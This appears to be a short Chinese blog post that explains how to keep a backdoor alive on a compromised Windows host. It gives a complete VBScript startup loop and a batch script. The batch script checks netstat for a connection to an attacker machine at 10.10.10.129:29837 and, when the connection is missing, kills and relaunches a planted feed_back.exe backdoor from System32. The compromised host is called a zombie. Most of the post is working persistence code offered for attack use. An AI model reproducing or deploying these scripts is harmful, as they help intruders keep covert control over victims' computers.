首先我们通过445或者其他的方式获取到了主机system权限,然后在C:WindowsSystem32目录下放一个名为feed_back.exe的后门和一个名为initiate.bat的批处理,然后在启动项中放入initiate.vbs,当主机启动时,vbs脚本会以指定的时间间隔调用initiate.bat,该bat脚本负责判断肉鸡与我们的攻击机是否建立连接,并决定是否运行后门,文件内容如下:
initiate.vbs:

wscript.sleep(300000)
set ws=Wscript.CreateObject("wscript.shell")
while true
    call ws.Run("C:\WINDOWS\System32\initiate.bat",0)
    wscript.sleep(60000)
wend

initiate.bat:

@echo off 
setlocal ENABLEDELAYEDEXPANSION  

netstat -ano | findstr "10.10.10.129:29837" > %temp%\temp.txt
for /F %%k in ('type %temp%\temp.txt ^| find /i "ESTABLISHED" /c') do (  
    if %%k equ 1 (
        echo succeed
    ) else (
        rem connection has been establishedrem no matter what, just killed feed_back.exe
        rem get pid of feed_back.exe, 
        for /f "delims=, tokens=2" %%a in ('tasklist /FI "IMAGENAME eq feed_back.exe" /fo csv /nh') do (
            set str=%%~a
            rem if true, kill this process
            if defined str (
                taskkill /F /PID !str!
            )
        )
        rem connection has not been established
        rem excute the feedback program
        C:\WINDOWS\System32\feed_back.exe
    )
)

可通过改变sleep中的值来控制间隔时间

标签: none

添加新评论